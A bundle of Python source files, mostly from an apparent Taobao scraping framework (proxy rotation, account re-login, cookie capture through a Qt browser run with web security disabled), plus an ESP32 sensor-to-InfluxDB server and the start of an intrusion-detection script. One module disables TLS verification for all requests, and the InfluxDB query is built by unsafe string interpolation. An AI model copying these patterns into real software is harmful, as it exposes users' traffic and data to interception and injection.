class BitHelper(object):
def enable(self):
value = getattr(self, name)
value |= mask
setattr(self, name, value)
def disable(self):
value = getattr(self, name)
value &= ~mask
setattr(self, name, value)
def is_enable(self):
value = getattr(self, name)
return bool(value & mask)
@staticmethod
def is_set_criterion():
def _(cls):
column = getattr(cls, name)
return column.op('&')(mask) != 0
return classmethod(_)
def set_value(self, is_enable):
value = getattr(self, name)
if is_enable:
value |= mask
else:
value &= ~mask
setattr(self, name, value)
bit_property = property(is_enable, set_value)
return BitHelper
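# A minimal sketch (illustrative names) of how bit_column_helper is meant to be used:
#     class DeleteBitMixin(bit_column_helper(offset=0, name='status')):
#         pass
#     # instance.enable() sets bit 0 of `status`; Model.is_set_criterion()
#     # yields a SQLAlchemy filter equivalent to `status & 1 != 0`.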
```
#### File: taobao_spider/common/mongo_.py
```python
import traceback
from contextlib import contextmanager
from pymongo import MongoClient
from config.config_loader import global_profile, logger
mongo_client = MongoClient(global_profile.MONGO_DATABASE_URI)
db = mongo_client.get_database(global_profile.MONGO_DB)
@contextmanager
def mongo_collection_scope(**kwargs):
collection_name = kwargs.get('collection_name')
try:
collection = db.get_collection(name=collection_name)
yield collection
except:
logger.error("failed to finish the mongo commit: %s", traceback.format_exc())
raise
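# usage sketch (collection name is hypothetical):
#
#     with mongo_collection_scope(collection_name='goods') as coll:
#         coll.insert_one({'sku': '123', 'price': 9.9})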
```
#### File: taobao_spider/common/redis_.py
```python
import redis
from config.config_loader import global_profile
redisInfo = {
'host': global_profile.REDIS_HOST,
'password': global_profile.REDIS_PASSWORD,
'port': global_profile.REDIS_PORT,
'db': global_profile.REDIS_DB
}
class PoolingRedisClient(object):
def __init__(self):
if not hasattr(PoolingRedisClient, 'pool'):
            PoolingRedisClient.getRedisCoon()  # create the shared redis connection pool
# self.connection = redis.Redis(connection_pool=PoolingRedisClient.pool)
@staticmethod
def getRedisCoon():
PoolingRedisClient.pool = redis.ConnectionPool(host=redisInfo['host'], password=redisInfo['password'],
port=redisInfo['port'], db=redisInfo['db'])
redis_pool = PoolingRedisClient()
def get_redis_client():
return redis.Redis(connection_pool=redis_pool.pool)
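# usage sketch (key name is hypothetical): every caller shares the
# module-level connection pool created above
#
#     client = get_redis_client()
#     client.set('spider:heartbeat', '1', ex=60)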
```
#### File: mall_spider/dao/utils.py
```python
from __future__ import absolute_import, print_function
import copy
from sqlalchemy import desc
from sqlalchemy.orm.attributes import InstrumentedAttribute
from sqlalchemy.schema import Column
from sqlalchemy.sql.expression import ColumnElement
def get_model_pks(model_cls):
rtn = set()
if hasattr(model_cls, '_sa_class_manager'):
class_manager = getattr(model_cls, '_sa_class_manager')
if hasattr(class_manager, 'mapper'):
mapper = getattr(class_manager, 'mapper')
if hasattr(mapper, '_all_pk_props'):
pks = getattr(mapper, '_all_pk_props')
if pks:
for pk in pks:
rtn.add(getattr(pk, 'description'))
else:
for key in model_cls.__dict__:
item = getattr(model_cls, key, None)
if item is not None and isinstance(item, Column) and hasattr(item, 'primary_key') and item.primary_key:
rtn.add(item.name)
return rtn
def get_model_onupdates(model_cls):
rtn = {}
properties = _extract_model_properties(model_cls)
for pro in properties:
column = getattr(model_cls, pro)
try:
onupdate = getattr(column, 'onupdate')
if onupdate is not None:
rtn[pro] = onupdate
except AttributeError:
pass
return rtn
def fill_model(_model, _conditions):
_, conditions = _unpack_conditions(type(_model), _conditions)
properties = _extract_model_properties(type(_model))
fill_properties = list(set(properties).intersection(set(conditions.keys())))
for prop in fill_properties:
value = conditions.get(prop)
if isinstance(value, (list, dict, tuple, set)):
value = copy.deepcopy(value)
setattr(_model, prop, value)
def copy_model_ignore_properties(_model_target, _model_source, *args):
properties = _extract_model_properties(type(_model_target))
for prop in properties:
if args and prop not in args and hasattr(_model_source, prop):
setattr(_model_target, prop, getattr(_model_source, prop))
def copy_model(_model_target, _model_source):
copy_model_ignore_properties(_model_target, _model_source)
def _merge_condition(model_cls, _conditions):
equals_dict = dict()
scope_dict = dict()
in_dict = dict()
format_conditions, _ = _unpack_conditions(model_cls, _conditions)
def set_condition(k, v):
if isinstance(v, (list, set, tuple)):
in_dict[k] = v
else:
equals_dict[k] = v
for prop, value in format_conditions.items():
set_condition(prop, value)
return equals_dict, scope_dict, in_dict
def _unpack_conditions(model_cls, _conditions):
rtn_cond = dict()
key_cond = dict()
for k in _conditions.keys():
if isinstance(k, Column):
key = k.name
prop = getattr(model_cls, key, None)
elif isinstance(k, InstrumentedAttribute):
key = k.key
prop = k
        # on Python 2 this branch also accepted `unicode`
        elif isinstance(k, str):
key = k
prop = getattr(model_cls, k, None)
else:
continue
v = _conditions.get(k)
if prop:
rtn_cond[prop] = v
key_cond[key] = v
return rtn_cond, key_cond
def _unpack_entities(model_cls, entities):
rtn = []
for entity in entities:
rtn.append(_unpack_entity(model_cls, entity))
return rtn
def _unpack_entity(model_cls, source):
if isinstance(source, Column) and source.name:
return getattr(model_cls, source.name)
    # on Python 2 this branch also accepted `unicode`
    elif isinstance(source, str):
return getattr(model_cls, source)
else:
return source
def _extract_model_properties(model_cls):
if hasattr(model_cls, '_sa_class_manager'):
class_manager = getattr(model_cls, '_sa_class_manager')
if class_manager:
if hasattr(class_manager, '_all_key_set'):
return list(getattr(class_manager, '_all_key_set'))
elif hasattr(class_manager, 'keys'):
return class_manager.keys()
else:
rtn = list()
attr_names = model_cls.__dict__
for attr_name in attr_names:
v = getattr(model_cls, attr_name)
if isinstance(v, InstrumentedAttribute):
rtn.append(attr_name)
return rtn
def _with_entities(model_cls, entities, query):
if not isinstance(entities, (set, list, tuple)):
entities = (entities,)
else:
if len(entities) == 0:
return []
actual_entities = _unpack_entities(model_cls, entities)
if actual_entities:
query = query.with_entities(*actual_entities)
return query
def _filter_equals(query, filter_dict):
for k in filter_dict.keys():
v = filter_dict.get(k)
query = query.filter(k == v)
return query
def _filter_scope(query, item, range_p):
if range_p.begin is not None:
if range_p.begin_equals:
query = query.filter(item >= range_p.begin)
else:
query = query.filter(item > range_p.begin)
if range_p.end is not None:
if range_p.end_equals:
query = query.filter(item <= range_p.end)
else:
query = query.filter(item < range_p.end)
return query
def _filter_in(query, filter_dict):
for k in filter_dict.keys():
v = filter_dict.get(k)
query = query.filter(k.in_(v))
return query
def _order_by(query, model_cls, order_by):
if not isinstance(order_by, (list, tuple)):
order_bys = (order_by,)
else:
order_bys = order_by
for order_by_ in order_bys:
if order_by_ is not None:
            # on Python 2 this branch also accepted `unicode`
            if isinstance(order_by_, str) and order_by_.startswith('-'):
query = query.order_by(desc(order_by_[1:]))
else:
order_by_ = _unpack_entity(model_cls, order_by_)
query = query.order_by(order_by_)
return query
def _group_by(query, model_cls, group_by):
if not isinstance(group_by, (list, tuple)):
group_bys = (group_by,)
else:
group_bys = group_by
for group_by_ in group_bys:
if group_by_ is not None:
group_by_ = _unpack_entity(model_cls, group_by_)
query = query.group_by(group_by_)
return query
def _check_param(*args, **kwargs):
for arg in args:
if arg is not None:
return True
for v in kwargs.values():
if v:
return True
return False
class _Query(object):
def __init__(self, model_cls, session):
self._model_cls = model_cls
self._session = session
self._query = self._session.query(model_cls)
self._exception = None
def with_entities(self, entities):
if entities is not None:
self._query = _with_entities(self._model_cls, entities, self._query)
return self
def order_by(self, order_by):
if order_by is not None:
self._query = _order_by(self._query, self._model_cls, order_by)
return self
def group_by(self, group_by):
if group_by is not None:
self._query = _group_by(self._query, self._model_cls, group_by)
return self
def limit(self, limit_):
if limit_ is not None:
self._query = self._query.limit(limit_)
return self
def offset(self, offset_):
if offset_ is not None:
self._query = self._query.offset(offset_)
return self
def filter_by(self, **kwargs):
if kwargs:
equals_dict, scopes_dict, in_dict = _merge_condition(self._model_cls, kwargs)
if equals_dict:
self._query = _filter_equals(self._query, equals_dict)
if in_dict:
self._query = _filter_in(self._query, in_dict)
if scopes_dict:
for k in scopes_dict.keys():
v = scopes_dict.get(k)
self._query = _filter_scope(self._query, k, v)
return self
def filter(self, filters_):
if filters_ is not None:
if isinstance(filters_, (tuple, list, set)):
for filter_ in filters_:
self._query = self._query.filter(filter_)
elif isinstance(filters_, ColumnElement):
self._query = self._query.filter(filters_)
return self
def count(self):
from sqlalchemy import func
pks = get_model_pks(self._model_cls)
entities = []
for pk in pks:
entities.append(getattr(self._model_cls, pk))
return self._query.with_entities(func.count(*entities)).scalar()
def with_for_update(self):
return self._query.with_for_update()
def all(self):
return self._query.all()
def first(self):
return self._query.first()
def exists(self):
return self._query.exists()
def delete(self):
rtn = self._query.all()
self._query.delete(synchronize_session=False)
self._session.expire_all()
return rtn
def scalar(self):
return self._query.scalar()
def make_query(model_cls, _session):
return _Query(model_cls, _session)
```
#### File: mall_spider/job/login_job.py
```python
from common.db import write_session_scope
from config.config_loader import logger, global_config
from mall_spider.dao.stream_risk_dao import get_stream_risk_dao
from mall_spider.job.smorf import Smorf
from mall_spider.model.cmm_sys_stream_risk import CmmSysStreamRisk
from mall_spider.spiders.actions.action_service import ActionService
from mall_spider.spiders.actions.proxy_service import get_proxy_service
class LoginJob(ActionService, Smorf):
def __init__(self, num):
super().__init__()
self.account_num = num
self._proxy_service = get_proxy_service()
def execute(self):
with write_session_scope() as session:
_stream_risk_dao = get_stream_risk_dao(session=session)
rsts = _stream_risk_dao.base_query.limit(self.account_num).all()
if rsts:
for item in rsts:
username = item.raw_data
account = global_config.s_accounts_dict[username]
proxy = self._proxy_service.get_origin_static_proxy(account['username'])
self._login(account=account, force=True, risk=True, proxy=proxy)
_stream_risk_dao.delete(_filter=[CmmSysStreamRisk.id == item.id])
session.commit()
def init(self):
super().init()
def init_argparse(self, parser):
super().init_argparse(parser)
def process(self):
self.execute()
if __name__ == "__main__":
s = LoginJob(1)
logger.info("start to execute login job")
s.process()
logger.error("exit login job")
```
#### File: mall_spider/job/sycm_schedule_job.py
```python
from apscheduler.schedulers.blocking import BlockingScheduler
from config.config_loader import logger
from mall_spider.spiders.actions.action_service import ActionService
class SycmScheduleJob(ActionService, BlockingScheduler):
def __init__(self):
super().__init__()
def handle(self):
# self.execute_sycm_category_job_init_actions()
self.add_job(self.execute_sycm_category_job_init_actions, 'cron', day_of_week='0-6', hour=10, minute=30,
second=0)
def run(self):
self.handle()
self.start()
if __name__ == "__main__":
s = SycmScheduleJob()
logger.info("start to execute sycm_schedule job")
s.run()
# jobs = s.get_jobs()
# print(jobs)
logger.error("exit sycm_schedule job")
```
#### File: mall_spider/model/__init__.py
```python
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
def to_dict(self):
return {c.name: getattr(self, c.name, None) for c in self.__table__.columns}
Base.to_dict = to_dict
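# usage sketch (SomeModel is hypothetical): any declarative model can now be
# serialized column-by-column
#
#     row = session.query(SomeModel).first()
#     payload = row.to_dict()   # {column_name: value, ...}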
```
#### File: spiders/actions/action.py
```python
import traceback
from abc import ABCMeta, abstractmethod
from mall_spider.spiders.actions.executable import Executable
class Action(Executable):
__metaclass__ = ABCMeta
def execute(self, context):
self.on_create(context=context)
self.on_start(context=context)
try:
result = self.do_execute(context=context)
self.on_complete(context=context)
return result
        except Exception as e:
            self.on_error(context=context, exp=traceback.format_exc())
            # on Python 2 this re-raised with `raise exc_info[0], exc_info[1], exc_info[2]`
            raise e
finally:
self.on_destroy(context=context)
@abstractmethod
def do_execute(self, context):
pass
@abstractmethod
def on_create(self, context):
pass
@abstractmethod
def on_start(self, context):
pass
@abstractmethod
def on_error(self, context, exp):
pass
@abstractmethod
def on_complete(self, context):
pass
@abstractmethod
def on_destroy(self, context):
pass
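# a minimal concrete Action, sketching how the template method above is meant
# to be subclassed (this example class is not part of the original file):
class PrintAction(Action):
    def do_execute(self, context):
        print(context)
        return True

    def on_create(self, context):
        pass

    def on_start(self, context):
        pass

    def on_error(self, context, exp):
        pass

    def on_complete(self, context):
        pass

    def on_destroy(self, context):
        pass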
```
#### File: spiders/actions/exception.py
```python
class IllegalArgumentException(Exception):
def __init__(self, *args, **kwargs):
super(IllegalArgumentException, self).__init__(*args, **kwargs)
class RetryException(Exception):
def __init__(self, *args, **kwargs):
super(RetryException, self).__init__(*args, **kwargs)
class NotFoundException(Exception):
def __init__(self, *args, **kwargs):
super(NotFoundException, self).__init__(*args, **kwargs)
class CookieExpiredException(Exception):
def __init__(self, *args, **kwargs):
super(CookieExpiredException, self).__init__(*args, **kwargs)
class ExitException(Exception):
def __init__(self, *args, **kwargs):
super(ExitException, self).__init__(*args, **kwargs)
class CookieNotFoundException(Exception):
def __init__(self, *args, **kwargs):
super(CookieNotFoundException, self).__init__(*args, **kwargs)
class CookieNeedUpdateException(Exception):
def __init__(self, *args, **kwargs):
super(CookieNeedUpdateException, self).__init__(*args, **kwargs)
class StatusCodeException(Exception):
def __init__(self, *args, **kwargs):
super(StatusCodeException, self).__init__(*args, **kwargs)
class InterruptException(Exception):
def __init__(self, *args, **kwargs):
super(InterruptException, self).__init__(*args, **kwargs)
class ProxyException(Exception):
def __init__(self, *args, **kwargs):
super(ProxyException, self).__init__(*args, **kwargs)
```
#### File: spiders/actions/pojo.py
```python
class Good(dict):
    meta = {
        'flag': '1',
        'categoryId': 'taobao category id',
        'categoryName': 'taobao category name',
        'brandId': 'taobao brand id',
        'brandName': 'taobao brand name',
        'modelId': 'taobao model id',
        'modelName': 'taobao model name',
        'priceInfo': [{
            'skuId': 'taobao skuId',
            'price': 'taobao actual price'
        }],
        'sellCount': 'taobao sales volume',
        'date': '2018-10-27'
    }
def set_flag(self, flag):
self['flag'] = flag
return self
def get_flag(self):
return self['flag']
def set_category_id(self, category_id):
self['categoryId'] = category_id
return self
def get_category_id(self):
return self['categoryId']
def set_category_name(self, category_name):
self['categoryName'] = category_name
return self
def set_brand_id(self, brand_id):
self['brandId'] = brand_id
return self
def get_brand_id(self):
return self['brandId']
def set_brand_name(self, brand_name):
self['brandName'] = brand_name
return self
def get_brand_name(self):
return self['brandName']
def set_model_id(self, model_id):
self['modelId'] = model_id
return self
def set_model_name(self, model_name):
self['modelName'] = model_name
return self
def get_model_name(self):
return self['modelName']
def get_query(self):
return self['brandName'] + '+' + self['modelName']
def set_price_info(self, price_info):
self['priceInfo'] = price_info
return self
def set_sell_count(self, sell_count):
self['sellCount'] = sell_count
return self
def set_date(self, date):
self['date'] = date
return self
def get_date(self):
return self['date']
def set_sku_base(self, sku_base):
self['skuBase'] = sku_base
return self
def get_sku_base(self):
return self['skuBase']
```
#### File: spiders/actions/proxy_service.py
```python
import time
from config.config_loader import global_config
from mall_spider.spiders.actions.context import Context
from mall_spider.spiders.actions.direct_proxy_action import DirectProxyAction
__proxy_service = None
class ProxyService(object):
proxies_set = set()
proxies_list = ['https://' + item['ip'] + ':' + item['port'] for item in global_config.s_proxy]
LOW_WATER_MARK = 5
proxy_fetch_url = "http://ip.11jsq.com/index.php/api/entry?method=proxyServer.generate_api_url&packid=1&fa=0&fetch_key=&qty=1&time=1&pro=&city=&port=1&format=json&ss=5&css=&dt=1&specialTxt=3&specialJson="
def __init__(self) -> None:
super().__init__()
self._counter = 0
def get_s_proxy(self, username):
proxy = global_config.s_proxy_dict[username]
url = 'https://' + proxy['ip'] + ':' + proxy['port']
return {
'https': url
}
def get_origin_s_proxy(self, username):
return global_config.s_proxy_dict[username]
def get_static_proxy(self, username):
if not global_config.static_proxy:
return None
proxy = global_config.static_proxy_dict[username]
if proxy['username'] and proxy['password']:
url = 'https://' + proxy['username'] + ':' + proxy['password'] + '@' + proxy['ip'] + ':' + proxy['port']
else:
url = 'https://' + proxy['ip'] + ':' + proxy['port']
return {
'https': url
}
def get_origin_static_proxy(self, username):
if not global_config.static_proxy:
return None
return global_config.static_proxy_dict[username]
def get_proxy(self):
if len(self.proxies_list) < self.LOW_WATER_MARK:
for i in range(0, int(self.LOW_WATER_MARK * 1) - len(self.proxies_list)):
self.fetch_proxy()
time.sleep(2)
proxy = self.proxies_list[self._counter % len(self.proxies_list)]
self._counter += 1
return {
'https': proxy
}
def fetch_proxy(self):
context = Context()
action = DirectProxyAction()
action.execute(context=context)
result = context.get(Context.KEY_PROXY_RESULT, [])
if result:
for item in result:
ip = item['IP']
port = str(item['Port'])
url = 'https://' + ip + ':' + port
if url not in self.proxies_set:
self.proxies_set.add(url)
self.proxies_list.append(url)
def remove_proxy(self, url, force=False):
if force:
self.proxies_set.remove(url)
self.proxies_list.remove(url)
def get_proxy_service():
global __proxy_service
if not __proxy_service:
__proxy_service = ProxyService()
return __proxy_service
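# usage sketch (URL is hypothetical): callers rotate through the pool via the
# module-level singleton
#
#     proxies = get_proxy_service().get_proxy()   # {'https': 'https://ip:port'}
#     requests.get(url, proxies=proxies)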
```
#### File: spiders/actions/taobao_sale_list_page_action_bak.py
```python
from mall_spider.spiders.actions.context import Context
from mall_spider.spiders.actions.http_action import HttpAction
class TaobaoSaleListPageAction(HttpAction):
def do_execute(self, context):
"""
:param context:
:return:
"""
http_request = context.get(Context.KEY_TAOBAO_SALE_LIST_HTTP_REQUEST)
response = self.execute_in_retry(context=context, http_request=http_request)
self.unmarshal(context=context, response=response)
return True
def unmarshal(self, context, response):
result = response.json()
context.attach(Context.KEY_TAOBAO_SALE_RESULT, result)
def on_create(self, context):
pass
def on_start(self, context):
pass
def on_complete(self, context):
pass
def on_destroy(self, context):
pass
```
#### File: spiders/actions/task_direct_collect_action.py
```python
from common.db import write_session_scope
from mall_spider.dao.stream_unhandle_task_dao import get_stream_unhandle_task_dao
from mall_spider.model.cmm_sys_stream_unhandle_task import CmmSysStreamUnhandleTask
from mall_spider.spiders.actions.context import Context
from mall_spider.spiders.actions.default_action import DefaultAction
class TaskDirectCollectAction(DefaultAction):
def do_execute(self, context):
task_type = int(context.get(Context.KEY_CURRENT_TASK_TYPE))
date_str = context.get(Context.KEY_DIRECT_COLLECT_DATE)
with write_session_scope() as session:
# stream_opt_data_dao = get_stream_opt_data_dao(session=session)
stream_unhandle_task_dao = get_stream_unhandle_task_dao(session=session)
tasks = stream_unhandle_task_dao.query(entities=[CmmSysStreamUnhandleTask.id, CmmSysStreamUnhandleTask.type,
CmmSysStreamUnhandleTask.raw_data,
CmmSysStreamUnhandleTask.origin_id],
_filter=[CmmSysStreamUnhandleTask.type == task_type,
CmmSysStreamUnhandleTask.date == date_str])
context.attach(Context.KEY_CURRENT_TASKS, tasks)
return True
def on_create(self, context):
pass
def on_start(self, context):
pass
def on_complete(self, context):
pass
def on_destroy(self, context):
pass
```
#### File: mall_spider/spiders/chrome_qt.py
```python
import sys
from http.cookies import SimpleCookie
from PyQt5.QtCore import QUrl
from PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEngineProfile
from PyQt5.QtWidgets import QWidget, QDesktopWidget, QApplication, QVBoxLayout
from requests.cookies import RequestsCookieJar
class ChromeQt(QWidget):
def cookie_added(self, cookie):
raw_form = bytes(cookie.toRawForm()).decode()
simple_cookie = SimpleCookie(raw_form)
        for morsel in simple_cookie.values():
            # RequestsCookieJar.set() accepts a Morsel and converts it
            self.cookies.set(morsel.key, morsel)
def __init__(self):
super().__init__()
self.init_ui()
        # scripts
self.profile = QWebEngineProfile.defaultProfile()
# requests cookies
self.cookies = RequestsCookieJar()
# qt cookies
self.profile.setPersistentCookiesPolicy(0)
self.cookie_store = self.profile.cookieStore()
self.cookie_store.cookieAdded.connect(self.cookie_added)
# exit
# self.webView.loadFinished.connect(self.load_finished)
def load_finished(self):
self.close()
def init_ui(self):
self.webView = QWebEngineView()
        # main layout
layout = QVBoxLayout(self)
layout.addWidget(self.webView)
self.show()
self.resize(1024, 800)
self.center()
def center(self):
        # frameGeometry() creates an invisible rectangle sized from the main window; in short, it copies this widget's geometry (size and position) into qr
qr = self.frameGeometry()
        # get the display's screen resolution and, from it, the center point of the screen
cp = QDesktopWidget().availableGeometry().center()
        # qr already has a width and height; moveCenter() moves its center to the screen center cp without changing its size
qr.moveCenter(cp)
        # move the window's top-left corner to qr's top-left corner, centering the application window on screen
self.move(qr.topLeft())
def load(self, url):
self.webView.load(QUrl(url))
def chrome_qt_bootstrap(url=None):
sys.argv.append('--disable-web-security')
sys.argv.append('--allow-file-access-from-files')
sys.argv.append('--allow-file-access')
app = QApplication(sys.argv)
b = ChromeQt()
b.load(url)
app.exec_()
return b.cookies
if __name__ == '__main__':
url = 'https://main.m.taobao.com/mytaobao/index.html'
cookies = chrome_qt_bootstrap(url)
print(cookies)
```
#### File: mall_spider/utils/money_util.py
```python
def yuan_2_cent(yuan):
    return str(int(float(yuan) * 100))
def cent_2_yuan(cent):
    # format with two decimals so fractional yuan are not truncated to an int
    return '%.2f' % (float(cent) / 100)
```
#### File: mall_spider/utils/parallel_task.py
```python
import os

# GEVENT_RESOLVER must be set before gevent is imported, or it has no effect
os.environ['GEVENT_RESOLVER'] = 'ares'

import gevent

from config.config_loader import logger
class ParallelTask(object):
# float timeout: If given, the maximum number of seconds to wait.
def __init__(self, timeout=None, raise_error=False):
self.timeout = timeout
self.raise_error = raise_error
self.tasks = []
def add_task(self, task, *args):
self.tasks.append(gevent.spawn(task, *args))
def run(self):
try:
gevent.joinall(self.tasks, timeout=self.timeout, raise_error=self.raise_error)
except Exception as ex:
logger.warning("[ParallelTask] run task fail", exc_info=1)
raise ex
return [task.value for task in self.tasks]
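# usage sketch (fetch_page is hypothetical): tasks run concurrently on gevent
# greenlets and run() returns their values in submission order
#
#     pt = ParallelTask(timeout=10)
#     pt.add_task(fetch_page, 'https://example.com')
#     pt.add_task(fetch_page, 'https://example.org')
#     results = pt.run()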
```
#### File: mall_spider/utils/requests_client.py
```python
import warnings
import requests
from urllib3.exceptions import InsecureRequestWarning
from mall_spider.utils import default_connect_timeout, default_timeout
class XSession(requests.Session):
def __init__(self):
super().__init__()
self.verify = False
        # Requests does not seem to use the system certificate store; for
        # convenience, skip HTTPS verification, which also makes it easy to
        # debug traffic through proxy tools...
# http://docs.python-requests.org/en/master/user/advanced/#ca-certificates
requests.Session = XSession
warnings.simplefilter('ignore', InsecureRequestWarning)
def get(url, params=None, headers=None, cookies=None, proxies=None, **kwargs):
session = requests.Session()
if headers:
session.headers.update(headers)
if cookies:
session.cookies = cookies
if proxies:
session.proxies = proxies
return execute(session.get, url, params=params, **kwargs)
def post(url, data=None, json=None, headers=None, cookies=None, proxies=None, **kwargs):
session = requests.Session()
if headers:
session.headers.update(headers)
if cookies:
session.cookies = cookies
if proxies:
session.proxies = proxies
return execute(session.post, url, data=data, json=json, **kwargs)
def execute(request, url, **kwargs):
connect_timeout = float(kwargs.pop('connect_timeout', default_connect_timeout))
timeout = float(kwargs.pop('timeout', default_timeout))
return request(url, timeout=(connect_timeout, timeout), **kwargs)
# timeout = float(kwargs.pop('timeout', default_timeout))
# retry = int(kwargs.pop('retry', default_retry))
# retry_interval = float(kwargs.pop('retry_interval', default_retry_interval))
# start_time = time.time()
# response = None
#
# while retry > 0:
# try:
# response = request(url, *args, timeout=connect_timeout, **kwargs)
# except ReadTimeout as e:
# logging.error(u'request url %s read time out,exp:%s' % (url, e))
# except RequestException as e:
# logging.error(u'request url %s execute time out' % url)
#
# while retry > 0:
# try:
# response = request(url, *args, timeout=connect_timeout, **kwargs)
# except RequestException as e:
# logging.info("Failed to get %s, exception: %s", url, e.message)
# if time.time() - start_time > timeout or response is not None:
# break
# retry -= 1
# time.sleep(retry_interval)
# if response is None:
# raise RequestException("Failed to request %s, request_body: %r" % (url, args))
# return response
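# usage sketch (URL is hypothetical): each call gets a fresh session with a
# (connect, read) timeout tuple resolved by execute()
#
#     resp = get('https://example.com/api', params={'q': '1'},
#                connect_timeout=3, timeout=10)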
```
#### File: mall_spider/utils/session_id_generator.py
```python
from abc import ABCMeta, abstractmethod
class SessionIdGenerator(object):
__metaclass__ = ABCMeta
@abstractmethod
def generate_id(self, session):
pass
```
#### File: test/common/test_util.py
```python
from unittest import TestCase
from common.db import write_session_scope
from common.retry import retry
from mall_spider.common.constants import Category
from mall_spider.common.enums import TaobaoTaskType
from mall_spider.dao.stream_unhandle_task_dao import get_stream_unhandle_task_dao
from mall_spider.model.cmm_sys_stream_unhandle_task import CmmSysStreamUnhandleTask
from mall_spider.spiders.actions.context import Context
from mall_spider.spiders.actions.pojo import Good
from mall_spider.spiders.actions.task_collect_action import TaskCollectAction
class TestUtil(TestCase):
@retry
def _retry(self):
print('retry')
raise Exception()
def test_retry(self):
self._retry()
def test_category(self):
rst = Category.check_cate_id(50015558, 50015560)
self.assertEqual(True, rst)
def test_get_tasks(self):
"""
get main category id that have sub category id
:return:
"""
accounts_category_ids_dict = Category.accounts_category_ids_dict
for key, value in accounts_category_ids_dict.items():
if value:
print(key)
def test_init_unhandle_tasks(self):
context = Context()
context.attach(Context.KEY_CURRENT_TASK_TYPE, TaobaoTaskType.sycm_init)
action = TaskCollectAction()
action.execute(context=context)
tasks = context.get(Context.KEY_CURRENT_TASKS, [])
for task in tasks:
id_ = task.id
raw_data = task.raw_data
date = raw_data['dateStr']
with write_session_scope() as session:
stream_unhandle_task_dao = get_stream_unhandle_task_dao(session=session)
mod_dict = {
'date': date
}
stream_unhandle_task_dao.update(mod_dict=mod_dict, _filter=[CmmSysStreamUnhandleTask.id == id_])
context = Context()
context.attach(Context.KEY_CURRENT_TASK_TYPE, TaobaoTaskType.sycm_list)
action = TaskCollectAction()
action.execute(context=context)
tasks = context.get(Context.KEY_CURRENT_TASKS, [])
for task in tasks:
id_ = task.id
raw_data = task.raw_data
good = Good(raw_data['goodResult'])
date = good.get_date()
with write_session_scope() as session:
stream_unhandle_task_dao = get_stream_unhandle_task_dao(session=session)
mod_dict = {
'date': date
}
stream_unhandle_task_dao.update(mod_dict=mod_dict, _filter=[CmmSysStreamUnhandleTask.id == id_])
context = Context()
context.attach(Context.KEY_CURRENT_TASK_TYPE, TaobaoTaskType.taobao_list)
action = TaskCollectAction()
action.execute(context=context)
tasks = context.get(Context.KEY_CURRENT_TASKS, [])
for task in tasks:
id_ = task.id
raw_data = task.raw_data
good = Good(raw_data['goodResult'])
date = good.get_date()
with write_session_scope() as session:
stream_unhandle_task_dao = get_stream_unhandle_task_dao(session=session)
mod_dict = {
'date': date
}
stream_unhandle_task_dao.update(mod_dict=mod_dict, _filter=[CmmSysStreamUnhandleTask.id == id_])
``` |
{
"source": "524c/esp32-grafana",
"score": 3
} |
#### File: 524c/esp32-grafana/server.py
```python
from fastapi import FastAPI
from typing import Optional
from pydantic import BaseModel
import uvicorn
from influxdb_client import InfluxDBClient, Point
from influxdb_client.client.write_api import SYNCHRONOUS
# influx interface class
class SensorData(object):
def __init__(self, bucket, org, token):
self.bucket = bucket
self.token = token
self.org = org
self.client = InfluxDBClient(url="http://localhost:8086", token=token, org=org)
self.write_api = self.client.write_api(write_options=SYNCHRONOUS)
self.query_api = self.client.query_api()
def write(self, point):
# p = Point("my_measurement").tag("location", "Prague").field("temp", 25.3)
# write_api.write(bucket=bucket, record=p)
self.write_api.write(bucket=self.bucket, record=point)
def query(self, query):
return self.query_api.query(query)
    def get_last_point(self, measurement, tag_key, tag_value):
        # note: influxdb_client's query_api expects Flux; this InfluxQL-style
        # string will not run against InfluxDB 2.x without translation
        query = f"select * from {measurement} where {tag_key} = '{tag_value}' order by time desc limit 1"
        return self.query(query)
def query_csv(self, query):
# query_csv('from(bucket:"my-bucket") |> range(start: -10m)')
return self.query_api.query_csv(query)
class Sensor(BaseModel):
name: str
sensor1: float
sensor2: Optional[float] = None
description: Optional[str] = None
app = FastAPI()
INFLUXDB_BUCKET = "causa_efeito"
INFLUXDB_ORG = "causa_efeito"
influx = SensorData(bucket=INFLUXDB_BUCKET, org=INFLUXDB_ORG, token="<PASSWORD>")
@app.get("/")
async def root():
return {"message": "Hello World"}
@app.post("/api/v1/sensor")
async def create_item(sensor: Sensor) -> str:
data = sensor.dict()
print(f"post data: {data}")
p = (
Point("metric")
.tag("sensor", data["name"])
.field("sensor1", data["sensor1"])
.field("sensor2", data["sensor2"])
.field("time_precision", "ms")
)
influx.write(p)
return "ok"
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=8000)
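    # example request against the endpoint above (values are illustrative):
    #
    #   curl -X POST http://localhost:8000/api/v1/sensor \
    #        -H 'Content-Type: application/json' \
    #        -d '{"name": "esp32-1", "sensor1": 25.3, "sensor2": 60.1}'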
``` |
{
"source": "525309178/fp-growth",
"score": 2
} |
#### File: 525309178/fp-growth/test2.py
```python
from __future__ import print_function
# python3
# -*- coding: utf-8 -*-
# @Author : lina
# @Time : 2018/5/13 11:40
import fp_growth_py3 as fpg
import fp_growth as fpg1
import pandas as pd
from sklearn.preprocessing import LabelEncoder,OneHotEncoder
from keras.callbacks import ReduceLROnPlateau
import numpy as np
from sklearn.model_selection import train_test_split
import os
np.random.seed(1337) # for reproducibility
from keras.preprocessing import sequence
from keras.utils import np_utils
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Embedding,BatchNormalization
from keras.layers import LSTM, SimpleRNN, GRU
from keras.datasets import imdb
from keras.utils.np_utils import to_categorical
from sklearn.metrics import (precision_score, recall_score,f1_score, accuracy_score,mean_squared_error,mean_absolute_error)
from sklearn import metrics
from sklearn.preprocessing import Normalizer, OneHotEncoder,LabelBinarizer
from sklearn import preprocessing
import h5py
from keras import callbacks
from keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau, CSVLogger
# 数据集
dataset = [
['啤酒', '牛奶', '可乐'],
['尿不湿', '啤酒', '牛奶', '橙汁'],
['啤酒', '尿不湿'],
['啤酒', '可乐', '尿不湿'],
['啤酒', '牛奶', '可乐']
] #type list
###################################################################################################
train_path = './KDDTrain+_2.csv'
test_path = './KDDTest+_2.csv'
save_path = '/home/administrator/PycharmProjects/Network-Intrusion-Detection-DNN/NSL-KDD-TEST/checkpoint'
